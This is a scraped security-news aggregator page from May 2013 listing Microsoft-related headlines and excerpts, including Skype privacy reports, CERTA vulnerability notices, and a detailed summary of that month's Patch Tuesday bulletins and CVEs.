shame this is still rumbling on in Europe On The Other Hand, Google s clearly a monopoly and with great power comes great responsibility for Forbes NetApp'Voice OTOH NetAppVoice Europe Says Google's Promises Are Not Enough As Microsoft Silently Cheers attached image IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/448177.shtmlhttp://www.secuobs.com/revue/news/448177.shtml 2013-05-27 16:41:27 - Global Security Mag Online : Tech Data et Microsoft donnent rendez-vous à leurs clients au rythme d'une ville par semaine à travers L'Europe A L'occasion de ce rendez-vous unique les revendeurs informatiques pourront approfondir leur connaissance sur les derniers produits Microsoft et mieux appréhender les récentes évolutions du marché du Logiciel Nos partenaires Asus, Fujitsu, Hp, Intel, Lenovo, Samsung et Toshiba seront également présents sur le salon afin de présenter leurs nouvelles gammes de produits pensés pour Windows - Événements http://www.secuobs.com/revue/news/447910.shtmlhttp://www.secuobs.com/revue/news/447910.shtml 2013-05-25 13:07:09 - securitystream.info : Correspondent Suzie N V Lester-Shipman In my estimation which a whole lot of folks acquainted with how to use microsoft excel, nevertheless my personal real real question is did everyone make use of excel pre-created templates Inches Sure, this can be well known functions ofRead more http://www.secuobs.com/revue/news/447727.shtmlhttp://www.secuobs.com/revue/news/447727.shtml 2013-05-25 09:06:29 - Tout sur la cybersécurité la cyberdéfense ... : Un rapport récent du East African journal kenyan fait état d une perte totale d environ 17,5 millions pour les banques du Kenya Cette perte qui concerne l année écoulée a été causée par les fraudes en tout genre Les cybercriminels étant identifiés comme les acteurs principaux de ces fraudes Lire ici http://www.secuobs.com/revue/news/447711.shtmlhttp://www.secuobs.com/revue/news/447711.shtml 2013-05-25 08:19:17 - Tout sur la cybersécurité la cyberdéfense ... : Selon un site web et un chercheur allemand, la firme de Redmond surveillerait de manière régulière le contenu des messages Skype pour des raisons de sécurité Plusieurs associations s inquiètent du respect du caractère privé des conversations Les utilisateurs de Skype devront peut-être reconsidérer la confiance qu ils accordent au système de communication VoIP En effet, selon http://www.secuobs.com/revue/news/447703.shtmlhttp://www.secuobs.com/revue/news/447703.shtml 2013-05-24 15:13:42 - Network World on Security : Microsoft brushed off a dubious hacker's claim on Thursday that he stole 47 million account credentials for Microsoft's Xbox Live gaming service http://www.secuobs.com/revue/news/447539.shtmlhttp://www.secuobs.com/revue/news/447539.shtml 2013-05-23 22:06:10 - Security Bloggers Network : By pure luck I found the Microsoft Remote Connectivity Analyzer as I m not into the Microsoft world Anyway this web site lets you test easily if the Groupware server you re using is configured correctly For example if you ve problems connecting syncing with your mobile or tablet to a server via ActiveSync This protocol is not just http://www.secuobs.com/revue/news/447420.shtmlhttp://www.secuobs.com/revue/news/447420.shtml 2013-05-23 20:48:27 - Network World on Security : A Google security engineer accused Microsoft of treating outside researchers with great hostility days before posting details of an unpatched vulnerability in Windows that could be used to crash PCs or gain additional access rights http://www.secuobs.com/revue/news/447399.shtmlhttp://www.secuobs.com/revue/news/447399.shtml 2013-05-23 09:50:55 - Help Net Security News : The issue addresses last week by The H and their associates at heise Security of whether or not Microsoft checks links contained in encrypted Skype chat sessions and their claim that it did has raised http://www.secuobs.com/revue/news/447235.shtmlhttp://www.secuobs.com/revue/news/447235.shtml 2013-05-23 06:29:03 - Dinis Cruz Blog : Here is good post from Scott Allen on the topic Where Is NET Headed I agree with Scoot that the Net community is not as healthy as it could be, and that Microsoft should Open Source NET see some of the comments Of course that I'm biased, but I think that the fact that Microsoft and the NET community keeps ignoring all the Net innovation and ideas that I have been publishing on the O2 Platform see all these blog posts speaks volumes for the lack of adoption of new ideas For example, at the moment the O2 C REPL and the FluentSharp APIs, actually allow faster and more efficient development than VisualStudio you can also use O2 FluentSharp inside VisualStudio Yes, I know that I don't play Microsoft's game of singing NDAs and be part of their MVPs club, but that is no reason to ignore what is going on And yes there are still tons of usability problems in the current version of the O2 Platform not that VisualStudio can really claim that mantra , BUT, the point of innovation is that it is rough around the edges What I know is that Microsoft and NET community is missing a big opportunity by not learning and embracing what I'm doing in my conner of the interweb And for me, I'm confortable with my focus and efforts, since everytime I show the O2 Platform to NET developers they get very excited with what it can do and how it works here are a bunch of O2 Platform videos Also it is important to note that even really good NET developers, in May 2013 are NOT ABLE to 'use VisualStudio' as efficiently quickly as I can 'use the O2 Platform' to create NET applications So yes , this means that at the moment in the right hands the O2 Platform can be more productive than VisualStudio in fact the O2 Platform represents what VisualStudio 2020 will probably look like The key problem here is that I have lots of pressure to move O2 into other platforms and OS see OSX posts , and the more I keep being ignored, the less connection I have with the Microsoft-driven NET community And Microsoft in 2013 seems to have lost the concept that developers are one of their most amazing assets I am a primarily a NET developer even releasing developing commercial NET applications like TeamMentor and I really don't think that Microsoft cares And this lack of real focus on developers is why Microsoft needs to let Steve Ballmer go Microsoft needs to embrace technical software engineering excellence, from the top-down and down-up Microsoft needs to become again a Technology Development company with capital T and D One that cares about developers and is worried about the quality of the code it produces and encourages the production of quality code Microsoft should 'represent' code quality and great simple software engineering At the moment, it looks like Google is going to claim that title in the current decade IMAGE http://www.secuobs.com/revue/news/447204.shtmlhttp://www.secuobs.com/revue/news/447204.shtml 2013-05-22 22:04:23 - Security Bloggers Network : Evidently, the International Space Station has terminated the utilization of Microsoft Corporations' NasdaqGS MSFT Windows Operating Systems and attendant binaries http://www.secuobs.com/revue/news/447124.shtmlhttp://www.secuobs.com/revue/news/447124.shtml 2013-05-22 15:51:43 - Security Bloggers Network : Think your Skype communications are safe from prying eyes and ears You might need to think again http://www.secuobs.com/revue/news/447005.shtmlhttp://www.secuobs.com/revue/news/447005.shtml 2013-05-22 14:45:15 - Network World on Security : If you have any expectations about the privacy of your Skype communications, you may want to reassess them http://www.secuobs.com/revue/news/446988.shtmlhttp://www.secuobs.com/revue/news/446988.shtml 2013-05-21 21:49:26 - Security Bloggers Network : Last month my blog post discussed Microsoft s perspective on building a Cybersecurity Framework for critical infrastructure, which is part of President Obama s Executive Order on cybersecurity As a next step in the process of impleme http://www.secuobs.com/revue/news/446860.shtmlhttp://www.secuobs.com/revue/news/446860.shtml 2013-05-21 18:54:16 - Security Bloggers Network : Computer viruses are making a comeback, according to Microsoft s Director of Trustworthy Computing - with numbers rising globally in 2012 Tim Rains says that for several years, viruses have been out of favour with attackers , but points to statistics showing that they have made a comeback in 2012, at least in certain territories The post Computer viruses are making a comeback , says Microsoft appeared first on We Live Security http://www.secuobs.com/revue/news/446827.shtmlhttp://www.secuobs.com/revue/news/446827.shtml 2013-05-21 17:58:42 - Security Bloggers Network : Episode 109 of our popular Chet Chat podcast series is out Chet and Duck are back with their almost entirely reverent opinions on the latest computer security issues http://www.secuobs.com/revue/news/446801.shtmlhttp://www.secuobs.com/revue/news/446801.shtml 2013-05-21 17:14:10 - Slashdot Your Rights Online : Trailrunner7 writes The Microsoft Digital Crimes Unit has been spearheading botnet takedowns and other anti-cybercrime operations for many years, and it has had remarkable success But the cybercrime problem isn't going away anytime soon, so the DCU is in the process of building a new cybercrime center here, and soon will roll out a new threat intelligence service to help ISPs and CERT teams get better data about ongoing attacks Dennis Fisher sat down with TJ Campana, director of security at the DCU, to discuss the unit's work and what threats could be next on the target list IMAGE IMAGE Share on Google Read more of this story at Slashdot IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/446794.shtmlhttp://www.secuobs.com/revue/news/446794.shtml 2013-05-21 06:46:17 - Channel 9 : The good times just don't stop and this week was an absolute blast Watch Paul and Laura bring you the news and please chime in with your comments on these stories and more Facebook and Windows Phone 08 24 Xbox points for dollars 04 57 Microsoft tramp stamp 11 24 Star Trek and Microsoft 17 07 IMAGE http://www.secuobs.com/revue/news/446685.shtmlhttp://www.secuobs.com/revue/news/446685.shtml 2013-05-17 20:16:40 - CYBER ARMS Computer Security : Just when you thought Viruses where on the way out, it looks like they may be raising their ugly head yet again According to Microsoft, virus global detection rate hit 78pourcents in the fourth quarter of 2012 with some nations reaching over 40pourcents With the increase of Trojans and credential stealers, many thought we had http://www.secuobs.com/revue/news/446203.shtmlhttp://www.secuobs.com/revue/news/446203.shtml 2013-05-17 08:53:03 - KK's Blog : I downloaded Microsoft s newly released Visual Studio 2010 CTP virtual machine disk image hoping for a few surprises, but I certainly didn t expect this The Visual Studio 2010 CTP is a huge multi-gigabyte VM running Windows Server 2008 The first Continue reading http://www.secuobs.com/revue/news/446063.shtmlhttp://www.secuobs.com/revue/news/446063.shtml 2013-05-16 21:00:47 - Slashdot Your Rights Online : First time accepted submitter Stratus311 writes An article from The Verge shows a video leaked from Microsoft that parodies Google's Chrome ad From the article 'Microsoft and Google have been locked in a war of words over a YouTube Windows Phone app, but in the midst of the arguments a new Scroogled ad has emerged Designed to be an internal-only video, a copy has somehow managed to find its way onto the web right in the middle of Google's I O developer conference' Somehow leaked IMAGE IMAGE Share on Google Read more of this story at Slashdot IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/445924.shtmlhttp://www.secuobs.com/revue/news/445924.shtml 2013-05-15 19:07:22 - Les derniers documents du CERTA. : De multiples vulnérabilités ont été corrigées dans Microsoft Internet Explorer Elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance http://www.secuobs.com/revue/news/445637.shtmlhttp://www.secuobs.com/revue/news/445637.shtml 2013-05-15 19:07:22 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft Internet Explorer 8 Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance http://www.secuobs.com/revue/news/445636.shtmlhttp://www.secuobs.com/revue/news/445636.shtml 2013-05-15 19:07:22 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft Windows HTTPsys Elle permet à un attaquant de provoquer un déni de service à distance Ce composant est notamment utilisé dans le service IIS http://www.secuobs.com/revue/news/445635.shtmlhttp://www.secuobs.com/revue/news/445635.shtml 2013-05-15 19:07:22 - Les derniers documents du CERTA. : De multiples vulnérabilités ont été corrigées dans Microsoft NET Framework Elles permettent à un attaquant de provoquer un contournement de la politique de sécurité ou une usurpation d'identité http://www.secuobs.com/revue/news/445634.shtmlhttp://www.secuobs.com/revue/news/445634.shtml 2013-05-15 19:07:22 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft Lync Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance http://www.secuobs.com/revue/news/445633.shtmlhttp://www.secuobs.com/revue/news/445633.shtml 2013-05-15 19:07:22 - Les derniers documents du CERTA. : De multiples vulnérabilités ont été corrigées dans Microsoft Publisher Elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance http://www.secuobs.com/revue/news/445632.shtmlhttp://www.secuobs.com/revue/news/445632.shtml 2013-05-15 19:07:22 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft Word Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance http://www.secuobs.com/revue/news/445631.shtmlhttp://www.secuobs.com/revue/news/445631.shtml 2013-05-15 19:07:22 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft Visio Elle permet de provoquer des fuites d'informations au moyen d'un fichier XML spécialement conçu http://www.secuobs.com/revue/news/445630.shtmlhttp://www.secuobs.com/revue/news/445630.shtml 2013-05-15 19:07:22 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft Windows Essentials Elle permet à un attaquant de provoquer des fuites d'informations au moyen d'une page Web spécialement conçue http://www.secuobs.com/revue/news/445629.shtmlhttp://www.secuobs.com/revue/news/445629.shtml 2013-05-15 19:07:22 - Les derniers documents du CERTA. : De multiples vulnérabilités ont été corrigées dans le noyau Microsoft Windows Elles permettent à un attaquant de provoquer une élévation de privilèges http://www.secuobs.com/revue/news/445628.shtmlhttp://www.secuobs.com/revue/news/445628.shtml 2013-05-15 18:44:56 - Pedram Amini Blog : Just publicly released an advisory affecting the Microsoft Windows kernel Microsoft SRVSYS Mailslot Ring0 Memory Corruption Vulnerability I worked with H D Moore who you most recently heard of from his Browser Fun blog in discovering this bug This is a great example of the benefits of having a custom SMB stack, many thanks to HD for sacrificing his Sunday afternoon with me on this The kernel memory corruption is obviously interesting as it allows for ring0 code execution However, I find the following actual attack vector to be more interesting According to the Microsoft Developer Network MSDN documentation, Mailslot communications are divided into two classes First-class Mailslots are connection oriented and operate over SMB TCP Second-class Mailslots provide connectionless messaging for broadcast messages and operate over SMB UDP Second-class Mailslots are limited to 424 bytes per message First-class Mailslots are officially unsupported in the Windows 2000, XP and 2003 operating systems This is the key point as it means that any code relying on the implicit message size limitation could be exposing a vulnerability So add mailslots to your list of interfaces to enumerate and examine when auditing a target Look for calls to the CreateMailSlot API, example push 0 lpSecurityAttributes push 0 lReadTimeout push 0 nMaxMessageSize push slot_name mailslot mailslot_name call CreateMailslotA The nMaxMessageSize argument is key as it specifies the maximum size of a single message that can be written to the Mailslot in bytes, a value of zero allows for any arbitrary size this is what you want So the big question is, what else is exposed I know of at least one 3rd party application, details of which will be released when a patch is available A combination of Googling and examinaton of a number of targets tells me that Mailslot usage is pretty rare fortunate or unfortunate depending on your point of view , but I'm curious to see what the masses discover http://www.secuobs.com/revue/news/445603.shtmlhttp://www.secuobs.com/revue/news/445603.shtml 2013-05-15 16:40:28 - Help Net Security News : The question of whether Skype - a Microsoft subsidiary since May 2011 - allows US intelligence and law enforcement agencies to access the communications exchanged by its users has still not been ade http://www.secuobs.com/revue/news/445565.shtmlhttp://www.secuobs.com/revue/news/445565.shtml 2013-05-15 14:36:34 - Network World on Security : Just 11 days after issuing an advisory, Microsoft has released a patch for a bug in Internet Explorer 8 that bedeviled the US Department of Labor earlier this month http://www.secuobs.com/revue/news/445534.shtmlhttp://www.secuobs.com/revue/news/445534.shtml 2013-05-15 02:12:48 - Symantec Connect Security Response Billets : Hello, welcome to this month's blog on the Microsoft patch release This month the vendor is releasing 10 bulletins covering a total of 33 vulnerabilities Eleven of this month's issues are rated Critical As always, customers are advised to follow these security best practices Install vendor patches as soon as they are available Run all software with the least privileges required while still maintaining functionality Avoid handling files from unknown or questionable sources Never visit sites of unknown or questionable integrity Block external access at the network perimeter to all key systems unless specific access is required Microsoft's summary of the May releases can be found here http technetmicrosoftcom en-us security bulletin ms13-May The following is a breakdown of the issues being addressed this month 1 MS13-037 Cumulative Security Update for Internet Explorer 2829530 Internet Explorer Use After Free Vulnerability CVE-2013-1306 MS Rating Critical A remote code execution vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user JSON Array Information Disclosure Vulnerability CVE-2013-1297 MS Rating Important An information disclosure vulnerability exists in Internet Explorer that could allow an attacker to gain access and read the contents of JSON data files Internet Explorer Use After Free Vulnerability CVE-2013-1309 MS Rating Critical A remote code execution vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Use After Free Vulnerability CVE-2013-1307 MS Rating Critical A remote code execution vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Use After Free Vulnerability CVE-2013-1308 MS Rating Critical A remote code execution vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Use After Free Vulnerability CVE-2013-1310 MS Rating Critical A remote code execution vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Use After Free Vulnerability CVE-2013-0811 MS Rating Critical A remote code execution vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Use After Free Vulnerability CVE-2013-1311 MS Rating Critical A remote code execution vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Use After Free Vulnerability CVE-2013-2551 MS Rating Critical A remote code execution vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Use After Free Vulnerability CVE-2013-1312 MS Rating Critical A remote code execution vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Use After Free Vulnerability CVE-2013-1313 MS Rating Critical A remote code execution vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user 2 MS13-038 Security Update for Internet Explorer 2847204 Internet Explorer Use After Free Vulnerability CVE-2013-1347 MS Rating Critical A remote code execution vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website 3 MS13-039 Vulnerability in HTTPsys Could Allow Denial of Service 2829254 HTTPsys Denial of Service Vulnerability CVE-2013-1305 MS Rating Important A denial of service vulnerability exists in Windows Server 2012 and Windows 8 when the HTTP protocol stack HTTPsys improperly handles a malicious HTTP header An attacker who successfully exploited this vulnerability could trigger an infinite loop in the HTTP protocol stack by sending a specially crafted HTTP header to an affected Windows server or client 4 MS13-040 Vulnerabilities in NET Framework Could Allow Spoofing 2836440 XML Digital Signature Spoofing Vulnerability CVE-2013-1336 MS Rating Important A spoofing vulnerability exists when the Microsoft NET Framework fails to properly validate the signature of a specially crafted XML file An attacker who successfully exploited this vulnerability could modify the contents of an XML file without invalidating the signature associated with the file Authentication Bypass Vulnerability CVE-2013-1337 MS Rating Important A security feature bypass vulnerability exists in the way that the Microsoft NET Framework improperly creates policy requirements for authentication when setting up custom WCF endpoint authentication An attacker who successfully exploited this vulnerability would have access to the endpoint functions as if they were authenticated, allowing an attacker to steal information or take any actions in the context of an authenticated user 5 MS13-041 Vulnerability in Lync Could Allow Remote Code Execution 2834695 Lync RCE Vulnerability CVE-2013-1302 MS Rating Important A remote code execution vulnerability exists when the Lync control attempts to access an object in memory that has been deleted An attacker could exploit the vulnerability by convincing a target user to accept an invitation to launch specially crafted content within a Lync or Communicator session An attacker who successfully exploited this vulnerability could gain the same user rights as the current user 6 MS13-042 Vulnerabilities in Microsoft Publisher Could Allow Remote Code Execution 2830397 Publisher Negative Value Allocation Vulnerability CVE-2013-1316 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Publisher parses Publisher files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights Publisher Corrupt Interface Pointer Vulnerability CVE-2013-1318 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Publisher parses Publisher files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights Publisher Integer Overflow Vulnerability CVE-2013-1317 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Publisher parses Publisher files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights Publisher Buffer Overflow Vulnerability CVE-2013-1320 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Publisher parses Publisher files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights Publisher Return Value Handling Vulnerability CVE-2013-1319 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Publisher parses Publisher files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights Publisher Return Value Validation Vulnerability CVE-2013-1321 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Publisher parses Publisher files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights Publisher Invalid Range Check Vulnerability CVE-2013-1322 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Publisher parses Publisher files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights Publisher Incorrect NULL Value Handling Vulnerability CVE-2013-1323 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Publisher parses Publisher files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights Publisher Signed Integer Vulnerability CVE-2013-1327 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Publisher parses Publisher files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights Publisher Pointer Handling Vulnerability CVE-2013-1328 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Publisher parses Publisher files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights Publisher Buffer Underflow Vulnerability CVE-2013-1329 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Publisher parses Publisher files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights 7 MS13-043 Vulnerability in Microsoft Word Could Allow Remote Code Execution 2830399 Word Shape Corruption Vulnerability CVE-2013-1335 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Word parses content in Word files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights 8 MS13-044 Vulnerability in Microsoft Visio Could Allow Information Disclosure 2834692 XML External Entities Resolution Vulnerability CVE-2013-1301 MS Rating Important An information disclosure vulnerability exists in the way that Microsoft Visio parses specially crafted XML files containing external entities 9 MS13-045 Vulnerability in Windows Essentials Could Allow Information Disclosure 2813707 Windows Essentials Improper URI Handling Vulnerability CVE-2013-0096 MS Rating Important An information disclosure vulnerability exists when Windows Writer fails to properly handle a specially crafted URL An attacker who successfully exploited the vulnerability could override Windows Writer proxy settings and overwrite files accessible to the user on the target system 10 MS13-046 Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege 2840221 DirectX Graphics Kernel Subsystem Double Fetch Vulnerability CVE-2013-1332 MS Rating Important An elevation of privilege vulnerability exists when the Microsoft DirectX graphics kernel subsystem dxgkrnlsys improperly handles objects in memory Win32k Buffer Overflow Vulnerability CVE-2013-1333 MS Rating Important An elevation of privilege vulnerability exists when the Windows kernel-mode driver improperly handles objects in memory An attacker who successfully exploited this vulnerability could cause system instability Win32k Window Handle Vulnerability CVE-2013-1334 MS Rating Important An elevation of privilege vulnerability exists when the Windows kernel-mode driver improperly handles objects in memory An attacker who successfully exploited this vulnerability could execute arbitrary code with elevated privileges More information on the vulnerabilities being addressed this month is available at Symantec's free SecurityFocus portal and to our customers through the DeepSight Threat Management System http://www.secuobs.com/revue/news/445443.shtmlhttp://www.secuobs.com/revue/news/445443.shtml 2013-05-15 00:03:09 - SANS Internet Storm Center InfoCON green : Microsoft today also release http://www.secuobs.com/revue/news/445421.shtmlhttp://www.secuobs.com/revue/news/445421.shtml 2013-05-14 23:56:03 - Channel 9 : The fun never stops and the news just keeps coming Laura Paul stay on top of all of itfor you Microsoft appoints first female CFO Microsoft and Barnes Noble Official Facebook App I want to work at Microsoft IMAGE http://www.secuobs.com/revue/news/445417.shtmlhttp://www.secuobs.com/revue/news/445417.shtml 2013-05-14 22:11:30 - Security Bloggers Network : Today is Update Tuesday and Microsoft is releasing updates for 33 CVEs across 10 bulletins We'll be discussing some of the highlights hereOne of the most important updates MS13-038 that is being released is for the recent 0-day in Internet Explorer http://www.secuobs.com/revue/news/445399.shtmlhttp://www.secuobs.com/revue/news/445399.shtml 2013-05-14 21:09:42 - Security Bloggers Network : I keep hoping for an easy relaxing Patch Tuesday of say, only two or three bulletins but so far this year things haven t been so easy So far this year we have Patch Tuesdays of seven, ten and seven bulletins, respectfully, and this month we have ten hmm, is there a pattern there Not only that we have a zero-day vulnerability in Internet Explorer to deal with I long for months like September 2012 when there were but two bulletins but I should feel lucky that its not December 2010 or April 2011 when we had no less than seventeen http://www.secuobs.com/revue/news/445389.shtmlhttp://www.secuobs.com/revue/news/445389.shtml 2013-05-14 20:18:08 - SANS Internet Storm Center InfoCON green : Overview of the http://www.secuobs.com/revue/news/445382.shtmlhttp://www.secuobs.com/revue/news/445382.shtml 2013-05-14 20:14:20 - Help Net Security News : Today for Patch Tuesday, Microsoft and Adobe are both coming out with critical fixes for a number of widely installed and attacked programs Microsoft has 10 bulletins addressing a total of 33 vulnera http://www.secuobs.com/revue/news/445369.shtmlhttp://www.secuobs.com/revue/news/445369.shtml 2013-05-14 18:31:15 - Slashdot Your Rights Online : An anonymous reader writes A Microsoft server accesses URLs sent in Skype chat messages, even if they are HTTPS URLs and contain account information A reader of Heise publications notified Heise Security link to German website, Google translation They replicated the observation by sending links via Skype, including one to a private file storage account, and found that these URLs are shortly after accessed from a Microsoft IP address When confronted, Microsoft claimed that this is part of an effort to detect and filter spam and fishing URLs IMAGE IMAGE Share on Google Read more of this story at Slashdot IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/445344.shtmlhttp://www.secuobs.com/revue/news/445344.shtml 2013-05-14 15:50:27 - Security Bloggers Network : A posting from Cnet News in there Security Privacy section Microsoft has issued a warning that a new piece of malware masquerading as a Google Chrome extension and Firefox add-on is making the rounds, threatening to hijack Facebook accounts First detected in Brazil, Trojan JS FebiposA attempts to keep itself updated, just like normal, legitimate browser extensions, http://www.secuobs.com/revue/news/445308.shtmlhttp://www.secuobs.com/revue/news/445308.shtml 2013-05-13 22:50:22 - Security Bloggers Network : By Jeff Jones, director, Trustworthy Computing Today in Birmingham, England, Adrienne Hall, general manager of Trustworthy Computing, received one of three Professional Security Magazine s Women in Security awards for her leadership and signific http://www.secuobs.com/revue/news/445151.shtmlhttp://www.secuobs.com/revue/news/445151.shtml 2013-05-13 19:53:43 - 4sysops : A picture of Joseph Moody Joseph Moody - 0 comments Joseph Moody is a desktop administrator for a public school and help manage about 5,500 computers I specialize in Active Directory, Group Policy, and software deployment Microsoft Surface has received a few consistent complaints about shortcomings such as poor battery life and limited storage In this post I will outline a few fixes that prepared Microsoft s tablet PC for our corporate environment Copyright 2006-2013, 4sysops, Digital fingerprint 3db371642e7c3f4fe3ee9d5cf7666eb0 http://www.secuobs.com/revue/news/445121.shtmlhttp://www.secuobs.com/revue/news/445121.shtml 2013-05-13 12:36:36 - CNIS mag : Cet article du Houston Chronicle est le plus proche équivalent d un roman d horreur pour un commercial Microsoft Il nous apprend que chez Conroe, spécialiste de filtres industriels et de boîtes à graisse, maison de qualité, on utilise encore un IBM 402, une vénérable antiquité à cartes perforées et traitement mécanographique, capable, depuis la fin des http://www.secuobs.com/revue/news/444999.shtmlhttp://www.secuobs.com/revue/news/444999.shtml 2013-05-12 20:26:55 - Vigilance vulnérabilités publiques : Un attaquant peut inviter la victime à consulter un site web illicite ou à installer une application ASPNET illicite, afin de faire exécuter du code sur sa machine http://www.secuobs.com/revue/news/444917.shtmlhttp://www.secuobs.com/revue/news/444917.shtml 2013-05-12 00:11:21 - Security Bloggers Network : Microsoft's Patch Tuesday for May 2013 will be published in the coming week Paul Ducklin points out what to prepare for http://www.secuobs.com/revue/news/444847.shtmlhttp://www.secuobs.com/revue/news/444847.shtml 2013-05-10 23:40:13 - Dark Reading All Stories : Busy patch cycle awaits administrator this month http://www.secuobs.com/revue/news/444739.shtmlhttp://www.secuobs.com/revue/news/444739.shtml 2013-05-10 22:58:00 - Computer Security News : Patch Tuesday approaches quickly That time of the month when Microsoft deems it appropriate to fix the myriad security flaws that rear their ugly heads during the preceding time frame http://www.secuobs.com/revue/news/444737.shtmlhttp://www.secuobs.com/revue/news/444737.shtml 2013-05-10 21:26:18 - SANS Internet Storm Center InfoCON green : Both Adobe and Microsoft released pre-anouncements for next week's patch Tuesday more http://www.secuobs.com/revue/news/444723.shtmlhttp://www.secuobs.com/revue/news/444723.shtml 2013-05-10 13:53:05 - Network World on Security : Microsoft is issuing critical security bulletins this Patch Tuesday that affect all versions of Internet Explorer and deal with an exploit that attackers are actively working http://www.secuobs.com/revue/news/444611.shtmlhttp://www.secuobs.com/revue/news/444611.shtml 2013-05-10 10:41:52 - Help Net Security News : It is the week before Patch Tuesday May and Microsoft has published its Advance Notification, giving us insight into what to expect next Tuesday There will be 10 bulletins this month, covering al http://www.secuobs.com/revue/news/444579.shtmlhttp://www.secuobs.com/revue/news/444579.shtml 2013-05-10 00:11:23 - Security Bloggers Network : There will be ten bulletins released by Microsoft next Tuesday and one of those should be for the recent Internet Explorer zero-day discovered earlier this week Buletin 2 should cover the remote code execution of the IE-8 0day while Bulletin 1 will also cover RCE in IE 6 thru 10 We suspect Bulletin 1 will fix the issue discovered during the PWN2OWN competition at CanSecWest earlier this year Bulletins 3, 4, and 10 are in Windows itself including NET They are 